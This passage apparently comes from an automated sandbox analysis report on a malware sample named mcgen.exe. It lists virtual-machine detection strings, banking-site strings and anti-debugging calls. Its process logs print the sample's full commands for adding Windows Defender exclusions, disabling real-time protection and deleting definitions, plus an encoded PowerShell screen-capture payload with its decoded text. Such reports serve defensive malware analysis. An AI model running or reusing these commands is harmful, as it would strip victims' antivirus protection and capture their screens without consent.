              Source: mcgen.exe, 00000002.00000003.2406611412.000002C54FAED000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696487552u
              Source: mcgen.exe, 00000002.00000002.2526906103.000002C54E6D0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: If2vmusrvc
              Source: mcgen.exe, 00000002.00000003.2406611412.000002C54FAED000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696487552x
              Source: mcgen.exe, 00000002.00000003.2141838934.000002C54E522000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmwareuser
              Source: getmac.exe, 0000004C.00000002.2290574092.0000022C192DC000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000004C.00000003.2286655465.0000022C192DA000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000004C.00000003.2285677305.0000022C192C1000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000004C.00000003.2287617818.0000022C192DC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SetPropValue.sSubKeyName("SYSTEM\CurrentControlSet\Services\Hyper-V\Linkage");
              Source: mcgen.exe, 00000002.00000002.2525937902.000002C54E1F3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllh
              Source: mcgen.exe, 00000002.00000003.2406611412.000002C54FAED000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552
              Source: mcgen.exe, 00000002.00000003.2141838934.000002C54E522000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmwaretray
              Source: mcgen.exe, 00000002.00000003.2279385249.000002C54EA78000.00000004.00000020.00020000.00000000.sdmp, mcgen.exe, 00000002.00000003.2278631503.000002C54EBA4000.00000004.00000020.00020000.00000000.sdmp, mcgen.exe, 00000002.00000003.2406816664.000002C54F863000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Requirements: VM Monitor Mode Extensions: No
              Source: mcgen.exe, 00000002.00000003.2406611412.000002C54FAED000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696487552d
              Source: mcgen.exe, 00000002.00000003.2406611412.000002C54FAED000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696487552]
              Source: mcgen.exe, 00000002.00000003.2141893180.000002C54E540000.00000004.00000020.00020000.00000000.sdmp, mcgen.exe, 00000002.00000002.2526906103.000002C54E6D0000.00000004.00001000.00020000.00000000.sdmp, mcgen.exe, 00000002.00000003.2141838934.000002C54E522000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vboxtray
              Source: mcgen.exe, 00000002.00000002.2526906103.000002C54E6D0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: dytesqemu-ga
              Source: getmac.exe, 0000004C.00000002.2290574092.0000022C192DC000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000004C.00000003.2286655465.0000022C192DA000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000004C.00000003.2285677305.0000022C192C1000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000004C.00000003.2287617818.0000022C192DC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: __PARAMETERSSYSTEM\CurrentControlSet\Services\Hyper-V\LinkageExport
              Source: getmac.exe, 0000004C.00000002.2290526325.0000022C192C7000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000004C.00000003.2287247169.0000022C192C5000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000004C.00000003.2285677305.0000022C192C1000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000004C.00000003.2287859441.0000022C192C6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Win32_NetworkProtocolHyper-V RAWHyper-VRAWHyper-V RAW
              Source: mcgen.exe, 00000002.00000003.2406611412.000002C54FAED000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
              Source: mcgen.exe, 00000002.00000003.2406611412.000002C54FAED000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
              Source: mcgen.exe, 00000002.00000003.2406611412.000002C54FAED000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
              Source: getmac.exe, 0000004C.00000002.2290574092.0000022C192DC000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000004C.00000003.2286655465.0000022C192DA000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000004C.00000003.2285677305.0000022C192C1000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000004C.00000003.2287617818.0000022C192DC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SYSTEM\CurrentControlSet\Services\Hyper-V\Linkage
              Source: mcgen.exe, 00000002.00000003.2406611412.000002C54FAED000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
              Source: mcgen.exe, 00000002.00000003.2406611412.000002C54FAED000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
              Source: mcgen.exe, 00000002.00000003.2141838934.000002C54E522000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmwareservicerf
              Source: getmac.exe, 0000004C.00000003.2287247169.0000022C1929F000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000004C.00000002.2290374509.0000022C1929F000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000004C.00000003.2285677305.0000022C1929B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ssubkeyname"system\currentcontrolset\services\hyper-v\linkage"m Fil
              Source: mcgen.exe, 00000002.00000003.2406611412.000002C54FAED000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696487552s
              Source: mcgen.exe, 00000002.00000003.2141838934.000002C54E522000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmtoolsd
              Source: mcgen.exe, 00000002.00000003.2406611412.000002C54FAED000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696487552
              Source: mcgen.exe, 00000002.00000003.2406611412.000002C54FAED000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696487552t
              Source: mcgen.exe, 00000002.00000003.2406611412.000002C54FAED000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696487552x
              Source: mcgen.exe, 00000002.00000003.2406611412.000002C54FAED000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696487552}
              Source: mcgen.exe, 00000002.00000003.2406611412.000002C54FAED000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeCode function: 0_2_00007FF6B9F1D19C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF6B9F1D19C
              Source: C:\Users\user\Desktop\mcgen.exeCode function: 2_2_00007FFD948A5DD0 EntryPoint,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualProtect,VirtualProtect,2_2_00007FFD948A5DD0
              Source: C:\Users\user\Desktop\mcgen.exeCode function: 0_2_00007FF6B9F334F0 GetProcessHeap,0_2_00007FF6B9F334F0
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Users\user\Desktop\mcgen.exeCode function: 0_2_00007FF6B9F1D37C SetUnhandledExceptionFilter,0_2_00007FF6B9F1D37C
              Source: C:\Users\user\Desktop\mcgen.exeCode function: 0_2_00007FF6B9F1D19C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF6B9F1D19C
              Source: C:\Users\user\Desktop\mcgen.exeCode function: 0_2_00007FF6B9F1C910 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00007FF6B9F1C910
              Source: C:\Users\user\Desktop\mcgen.exeCode function: 0_2_00007FF6B9F2A684 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF6B9F2A684
              Source: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exeCode function: 103_2_00007FF695D2B6D8 SetUnhandledExceptionFilter,103_2_00007FF695D2B6D8
              Source: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exeCode function: 103_2_00007FF695D2A66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,103_2_00007FF695D2A66C
              Source: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exeCode function: 103_2_00007FF695D2B52C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,103_2_00007FF695D2B52C
              Source: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exeCode function: 103_2_00007FF695D34C10 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,103_2_00007FF695D34C10

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Source: C:\Users\user\Desktop\mcgen.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\mcgen.exe'"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\mcgen.exe'
              Source: C:\Users\user\Desktop\mcgen.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'
              Source: C:\Users\user\Desktop\mcgen.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\mcgen.exe'"Jump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"Jump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\mcgen.exe'"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\mcgen.exe'Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
              Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded $source = @"using System;using System.Collections.Generic;using System.Drawing;using System.Windows.Forms;public class Screenshot{ public static List<Bitmap> CaptureScreens() { var results = new List<Bitmap>(); var allScreens = Screen.AllScreens; foreach (Screen screen in allScreens) { try { Rectangle bounds = screen.Bounds; using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)) { using (Graphics graphics = Graphics.FromImage(bitmap)) { graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size); } results.Add((Bitmap)bitmap.Clone()); } } catch (Exception) { // Handle any exceptions here } } return results; }}"@Add-Type -TypeDefinition $source -ReferencedAssemblies System.Drawing, System.Windows.Forms$screenshots = [Screenshot]::CaptureScreens()for ($i = 0; $i -lt $screenshots.Count; $i++){ $screenshot = $screenshots[$i] $screenshot.Save("./Display ($($i+1)).png") $screenshot.Dispose()}
              Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded $source = @"using System;using System.Collections.Generic;using System.Drawing;using System.Windows.Forms;public class Screenshot{ public static List<Bitmap> CaptureScreens() { var results = new List<Bitmap>(); var allScreens = Screen.AllScreens; foreach (Screen screen in allScreens) { try { Rectangle bounds = screen.Bounds; using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)) { using (Graphics graphics = Graphics.FromImage(bitmap)) { graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size); } results.Add((Bitmap)bitmap.Clone()); } } catch (Exception) { // Handle any exceptions here } } return results; }}"@Add-Type -TypeDefinition $source -ReferencedAssemblies System.Drawing, System.Windows.Forms$screenshots = [Screenshot]::CaptureScreens()for ($i = 0; $i -lt $screenshots.Count; $i++){ $screenshot = $screenshots[$i] $screenshot.Save("./Display ($($i+1)).png") $screenshot.Dispose()}
              Source: C:\Users\user\Desktop\mcgen.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Users\user\Desktop\mcgen.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Users\user\Desktop\mcgen.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Users\user\Desktop\mcgen.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Users\user\Desktop\mcgen.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Users\user\Desktop\mcgen.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Users\user\Desktop\mcgen.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
